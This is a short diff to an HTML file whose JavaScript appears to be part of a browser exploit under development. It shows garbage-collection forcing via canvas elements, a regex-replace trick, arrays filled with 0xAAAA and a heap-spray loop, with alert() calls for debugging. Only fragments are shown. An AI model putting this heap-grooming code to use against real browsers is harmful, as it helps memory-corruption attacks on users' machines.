--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start4");
+alert("start1");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -63,7 +63,7 @@ arrcvs[j]=0xAAAA;
 x.replace(/\d/g, s1);
 alert("ok");
 alert(arrcvs[0].toString(16));
-var spray=new (0x800);
+var spray=new Array(0x800);
 for(var i=0;i<spray.length;i++){
  spray[i]=new Array(0x1e00);
  for(var j=0;j<0x1e00;j+=2){
